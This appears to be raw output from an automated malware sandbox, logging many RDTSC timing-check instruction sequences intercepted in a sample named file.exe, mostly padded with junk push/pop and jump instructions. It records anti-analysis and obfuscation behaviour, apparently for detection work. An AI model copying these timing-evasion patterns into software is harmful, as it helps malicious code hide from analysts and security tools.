Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D59D second address: A3D5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FE9A9298656h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5AE second address: A3D5B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5B4 second address: A3D5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE9A929866Ch 0x0000000c jmp 00007FE9A9298666h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5DA second address: A3D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D5DE second address: A3D5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8CB second address: A3D8D5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8D5 second address: A3D8E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE9A9298656h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8E1 second address: A3D8FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FE9A87AE1E8h 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007FE9A87AE1ECh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D8FF second address: A3D905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DA5A second address: A3DA67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FE9A87AE1E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DA67 second address: A3DA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE9A9298656h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jbe 00007FE9A929865Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FE9A9298656h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DA8B second address: A3DA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DD37 second address: A3DD41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9A929865Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DE8F second address: A3DE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40E5E second address: A40E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40E67 second address: A40E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40935 second address: A4094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE9A9298656h 0x0000000a pop edx 0x0000000b jne 00007FE9A929865Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4094C second address: A40967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F1h 0x00000007 jbe 00007FE9A87AE1F2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40967 second address: A40978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40978 second address: A409A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FE9A87AE1F5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A409A7 second address: A409AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40AF6 second address: A40AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40AFA second address: A40B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40B00 second address: A40B05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40B05 second address: A40B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A43E72 second address: A43E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE9A87AE1F9h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A43B0E second address: A43B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298664h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE9A9298663h 0x00000010 jmp 00007FE9A9298662h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A461FC second address: A46227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1EFh 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007FE9A87AE1F2h 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49032 second address: A49036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49036 second address: A49040 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49040 second address: A49058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FE9A9298656h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FE9A9298656h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A49058 second address: A4905C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4905C second address: A49060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4D3AE second address: A4D3C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9A87AE1E6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jno 00007FE9A87AE1E6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C6F8 second address: A4C6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C6FE second address: A4C70E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C70E second address: A4C729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FE9A9298656h 0x0000000e jmp 00007FE9A929865Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C729 second address: A4C72D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CC6A second address: A4CC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CDE7 second address: A4CDF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE9A87AE1ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CDF9 second address: A4CE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A929865Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CE0A second address: A4CE1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9A87AE1EAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CE1D second address: A4CE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CF42 second address: A4CF47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CF47 second address: A4CF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D24 second address: A51D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D28 second address: A51D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D2E second address: A51D35 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD8C6 second address: 9FD8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A52275 second address: A5228D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D517 second address: A5D521 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D521 second address: A5D53A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B578 second address: A5B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B57C second address: A5B580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B580 second address: A5B5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE9A9298668h 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jns 00007FE9A9298656h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FE9A9298660h 0x0000001f popad 0x00000020 jmp 00007FE9A9298669h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B5DA second address: A5B5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B5E0 second address: A5B5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B746 second address: A5B74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B8BF second address: A5B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B8C5 second address: A5B8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BBAC second address: A5BBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BBC3 second address: A5BBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C654 second address: A5C662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FE9A9298656h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C662 second address: A5C66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C66A second address: A5C670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C975 second address: A5C97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE9A87AE1E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C97F second address: A5C98D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C98D second address: A5C991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C991 second address: A5C997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C997 second address: A5C9B2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9A87AE1EEh 0x00000008 pushad 0x00000009 jns 00007FE9A87AE1E6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5CC62 second address: A5CC78 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9A9298656h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jno 00007FE9A9298656h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5CC78 second address: A5CC7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61FC1 second address: A61FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65325 second address: A65331 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE9A87AE1EEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65331 second address: A65386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FE9A9298662h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE9A9298663h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jmp 00007FE9A929865Bh 0x0000001c jmp 00007FE9A9298667h 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65386 second address: A65391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FE9A87AE1E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65391 second address: A65397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A654EF second address: A654FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65678 second address: A6567C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6567C second address: A6568B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6568B second address: A65695 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A657F5 second address: A657FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A657FA second address: A65806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FE9A9298656h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E941 second address: A6E97B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F6h 0x00000007 jg 00007FE9A87AE1E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007FE9A87AE1F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E97B second address: A6E97F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C9BF second address: A6C9D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FE9A87AE1E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6CB0D second address: A6CB3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298661h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE9A929865Fh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6CB3D second address: A6CB43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D0E0 second address: A6D0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D0E4 second address: A6D113 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9A87AE1E6h 0x00000008 jns 00007FE9A87AE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007FE9A87AE1E6h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE9A87AE1F2h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D2A3 second address: A6D2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D2A7 second address: A6D2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D432 second address: A6D445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D445 second address: A6D44A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D44A second address: A6D450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D450 second address: A6D465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE9A87AE1E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007FE9A87AE1ECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5B4 second address: A6D5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE9A929865Fh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007FE9A9298656h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5D6 second address: A6D5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5DB second address: A6D5E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5E0 second address: A6D5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D758 second address: A6D762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D762 second address: A6D766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E007 second address: A6E00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
